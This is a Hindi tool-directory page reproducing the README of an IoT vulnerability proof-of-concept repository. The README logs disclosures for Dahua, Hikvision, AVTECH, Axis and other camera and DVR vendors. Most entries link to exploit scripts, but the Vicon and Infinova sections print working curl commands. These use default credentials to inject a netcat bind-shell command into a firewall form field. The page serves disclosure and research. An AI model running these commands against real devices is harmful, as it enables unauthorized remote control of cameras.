Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
उपकरण/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

रिपॉजिटरी देखें
7833073 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC

विविध PoC - इंटरनेट ऑफ़ (इन)सिक्योरिटी थिंग्स

इन घटिया (अ)सुरक्षा चीज़ों के बारे में पढ़ना वाकई फायदेमंद है: https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260

2021-10-19

सारा श्रेय Watchful_IP (https://watchfulip.github.io/) को जाता है

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045

2021-10-06

विवरण: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC: https://github.com/mcw0/DahuaConsole

2021-09-06

दो स्वतंत्र प्रमाणीकरण बाइपास।

एक और "Dahua मास हैक" की अत्यधिक संभावना के कारण, मैं Full Disclosure विवरण 6 अक्टूबर, 2021 तक रोके रखूँगा।

तब तक फर्मवेयर अपग्रेड करने की अत्यधिक अनुशंसा करता हूँ।

https://www.dahuasecurity.com/support/cybersecurity/details/957

Dahua DES/3DES एन्क्रिप्ट/डिक्रिप्ट, NetSDK क्रेडेंशियल लीक, Cloud कुंजियाँ/पासवर्ड, DHP2P PoC

2020-05-09

  • Dahua DES/3DES (टूटा हुआ) प्रमाणीकरण कार्यान्वयन और PSK
  • कमजोरी: DVRIP और DHP2P प्रोटोकॉल का उपयोग करते समय Dahua NetSDK REALM अनुरोध में सभी क्लाइंट्स के क्रेडेंशियल (पहले 8 अक्षर) लीक कर रहा है
  • PoC: डिक्रिप्टेड क्रेडेंशियल्स को साफ़ टेक्स्ट में प्रदर्शित करने के लिए एक सरल TCP/37777 DVRIP लिसनर जोड़ा गया
  • कमजोरी: Dahua DHP2P Cloud प्रोटोकॉल क्रेडेंशियल लीकेज
  • कमजोरी: 23 अलग-अलग प्रदाताओं के लिए हार्डकोडेड DHP2P Cloud कुंजियाँ/पासवर्ड
  • PoC: DHP2P Cloud के भीतर उपकरणों तक पहुँच। PoC केवल Dahua IMOU के लिए बनाया गया

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

अपडेट: Dahua-JSON-Debug-Console-v2.py

2020-02-29

  • 'setDebug' विकल्प जोड़ा गया, VTO/VTH में Debug Console से आउटपुट उत्पन्न करना शुरू कर देना चाहिए
  • '--discover' जोड़ा गया, UDP/37810 के माध्यम से उपकरणों की मल्टीकास्ट खोज या उपकरण की सीधी जाँच (--rhost 192.168.57.20)
  • Debug Console में प्रवेश किए बिना रिमोट होस्ट पर कॉन्फ़िग या सेवाओं को डंप करने के लिए '--dump {config,service}' जोड़ा गया

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

अपडेट

2020-02-15

इस सप्ताह Dahua PSIRT के साथ संपर्क स्थापित किया गया, 23 अलग-अलग क्लाउड आपूर्तिकर्ताओं के लिए विवरण, PoC और प्रमाण प्रदान किए गए हैं। मैं Google Zero के नए परीक्षण 'Policy and Disclosure: 2020 Edition' का भी पालन करूँगा (क्योंकि यह मुझे उचित लगता है), यानी मैं 90 दिनों के बाद प्रकाशित करूँगा, भले ही Dahua 09.05.2020 19:00 UTC (9 मई, 2020 19:00 UTC) से पहले या बाद में अपडेट जारी करे या न करे।

Dahua, कृपया इस तिथि से पहले इसे ठीक करें और अपडेट उपलब्ध कराएँ...

संदर्भ: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

कुछ घंटे पहले

2020-02-10

मैंने अभी-अभी Dahua SDK से क्रेडेंशियल लीक (साफ़ टेक्स्ट में समाप्त होने वाले) Dahua PSIRT को प्रकट किए हैं, देखते हैं कि वे इस जानकारी को कैसे लेते हैं। जब +20 अलग-अलग क्लाउड प्रदाता शामिल हों तो यह काफी बुरा है... आज से 90 दिनों की गिनती शुरू।

टूल्स

2020-01-20

नया रिपॉजिटरी बनाया गया है जहाँ मैं कुछ टूल्स डालने की योजना बना रहा हूँ।

https://github.com/mcw0/Tools

सबसे पहला: Dahua-JSON-Debug-Console-v2.py

  • Python 3 पर पोर्ट किया गया
  • कुछ बग ठीक किए गए और कोड समायोजन किया गया
  • DVRIP (TCP/37777) के लिए समर्थन जोड़ा गया [नोट: कुछ JSON कमांड जो DHIP के साथ काम करते हैं, DVRIP के साथ कुछ भी नहीं लौटाते]
  • latin-1 में encode/decode, हमें 0x00 - 0xff के बीच अछूते वर्णों की आवश्यकता हो सकती है
  • विकल्प के रूप में hexdump के साथ बेहतर 'debug'

Axis Communications

2019-10-06 (पुरानी चीज़ें)

Axis उपकरणों (1998 - 2019) के मॉडल और फर्मवेयर संस्करण का अनाम रूप से पता लगाएँ।

https://github.com/mcw0/PoC/blob/master/axis-detect.py

Realtek Managed Switch Controller (RTL83xx) PoC

2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

कई नेटवर्क स्विचों में अनेक कमजोरियाँ

2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

सभी तकनीकी विवरण python PoC के साथ 20 अगस्त, 2019 को यहाँ पोस्ट किए जाएँगे।

LifeSafety Power

2019-05-15

एकाधिक स्टैक ओवरफ्लो, RCE, उपयोगकर्ता नाम/पासवर्ड का साफ़ टेक्स्ट में प्रकटीकरण और भी बहुत कुछ

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON Debug Console (प्रमाणित)

2019-04-10

यह स्क्रिप्ट Dahua 'DHIP' P2P बाइनरी प्रोटोकॉल का उपयोग करेगी, जो सामान्य HTTP/HTTPS पोर्ट्स और TCP/5000 पर काम करता है

JSON का उपयोग करके Dahua उपकरणों के आंतरिक 'Debug Console' से जुड़ेगा (TCP/6789 पर पूर्व डीबग के समान प्रकार)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

मज़े करें, bashis

VDOO

2019-01-23

नमस्ते, बहुत समय हो गया और कोई प्रकाशन नहीं...

मैं अभी भी मौजूद हूँ और अपना शोध कर रहा हूँ, लेकिन खबर यह है कि मैं विक्रेता प्रबंधन के लिए VDOO (https://www.vdoo.com/) के साथ भी काम करने का प्रयास कर रहा हूँ, और इसने दुर्भाग्य से मेरी Full Disclosure प्रक्रिया को कुछ हद तक विलंबित कर दिया है...

वैसे भी, मेरे इस GitHub पर Full Disclosure के रूप में कई दिलचस्प शोध आने वाले हैं।

VDOO के सहयोग से मैं वह कर सकता हूँ जो मुझे करना पसंद है, और उन विक्रेताओं के साथ समय बर्बाद नहीं करूँगा जो (नहीं चाहते | समझते नहीं | अनदेखा करना चाहते | विलंब करना चाहते | जो भी)।

सबसे नया कुछ Reolink (https://reolink.com/) सामग्री है, जिसे आप यहाँ पाएँगे: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC} हीप ओवरफ्लो, IPCP API, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (प्रमाणित)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd और OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} प्रमाणित RCE

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. IP कैमरा/वीडियो/एक्सेस कंट्रोल एकाधिक रिमोट कमांड निष्पादन - एकाधिक स्टैक ओवरफ्लो - डबल फ्री - अनधिकृत एक्सेस https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

Geovision Inc. IP कैमरा और वीडियो सर्वर रिमोट कमांड निष्पादन PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

Herospeed TelnetSwitch डेमॉन TCP/787 पर चल रहा है, telnetd को सक्षम करने की अनुमति देने के लिए। जहाँ एक छोटा स्टैक ओवरफ्लो हमें गतिशील रूप से उत्पन्न पासवर्ड को अधिलेखित करने और telnetd को सक्षम करने की अनुमति देता है। https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Foscam IPC फर्मवेयर इमेजेस पर विभिन्न एन्क्रिप्शन कुंजियों/डाइजेस्ट और साइफर को लूप करने के लिए छोटा OpenSSL रैपर। https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

विविध Foscam IPC बाइनरी और लाइब्रेरीज़ में स्ट्रिंग/लॉगिन/पासवर्ड/क्रिप्टोकुंजी को डीऑबफस्केट करें https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE और सूचना प्रकटीकरण (और संभावित अन्य OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

कई OEM के 'nsd' बाइनरी में रिमोट स्टैक फॉर्मेट स्ट्रिंग (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

छवि यहाँ: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

गैर-क्रैशिंग फॉर्मेट स्ट्रिंग बैकडोर प्रूफ ऑफ कॉन्सेप्ट

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (प्रमाणित)

2017-12-03

// 'IP Filter' सक्षम करें

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// 'IP Filter' में जोड़ें और निष्पादित करें

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// 'IP Filter' अक्षम करें

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// 'IP Filter' से हटाएँ

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (प्रमाणित)

2017-12-03

// 'IP Filter' सक्षम करें

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// 'IP Filter' में जोड़ें और निष्पादित करें

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// 'IP Filter' अक्षम करें

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// 'IP Filter' से हटाएँ

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

नोट: काफी निश्चित हूँ कि अतिरिक्त OEM भी हैं जो समान साझा करते हैं।

Axis Communications

2017-12-01 Axis Communications MPQT/PACS हीप ओवरफ्लो और सूचना लीकेज https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 रिवर्स stunnel TLSv1 प्राइवेसी शेल https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 Vivotek IP कैमरे - रिमोट स्टैक ओवरफ्लो https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 Uniview RCE और एक्सपोर्ट कॉन्फ़िग PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 Q3/2016 में एक पुराना भूला हुआ फ़ज़िंग जो RCE (PoC: रिमोट कनेक्ट बैक शेल) और /etc/shadow के रिमोट रीड की ओर ले गया। Axis को रिपोर्ट किया गया और Q3/2016 में ठीक किया गया, फिर भी इसे अभी यहाँ पोस्ट कर रहा हूँ क्योंकि यह एक अच्छा संकेत हो सकता है। https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Dahua में Telnetd सक्षम / अक्षम करें (नए फर्मवेयर संस्करणों के लिए) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Dahua Backdoor PoC का सार्वजनिक पुनःप्रकाशन https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

अपने नए पाए गए ज्ञान के साथ कि वहाँ 1 मिलियन से अधिक Dahua / OEM इकाइयों की अविश्वसनीय संख्या में कमजोर उपकरण मौजूद हैं, जहाँ यह ज्ञान NSFOCUS द्वारा बनाई गई एक रिपोर्ट और shodan.io पर मेरे अपने शोध से आया है।

इस ज्ञान के साथ, मैं Python PoC को जनता के लिए जारी नहीं करूँगा जैसा कि पहले 5 अप्रैल के बारे में कहा गया था, क्योंकि यह आवश्यक नहीं है जब PoC को पहले ही IPVM और अन्य स्वतंत्र सुरक्षा शोधकर्ताओं द्वारा सत्यापित किया जा चुका है।

हालाँकि, यदि वांछित हो तो मैं गंभीर सुरक्षा शोधकर्ताओं के साथ PoC साझा करने के लिए तैयार हूँ, कृपया मुझे सूची से बाहर ई-मेल करें और स्पष्ट रहें कि आप कौन हैं ताकि मैं आपको भिखारी न समझूँ, जिन्हें मैं अनदेखा करता हूँ।

NSFOCUS रिपोर्ट: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


क्या आपने Dahua के पैच पर दिनांक और समय स्टैम्प देखे? स्क्रीन शॉट्स देखें: http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

सूची में केवल NVR/DVR/IPC/HDCVI ही नहीं हैं

इंटरकॉम सिस्टम भी, VTO2000A की पुष्टि हो चुकी है http://www1.dahuasecurity.com/au/products/vto2000a-762.html

टूल डाउनलोड करें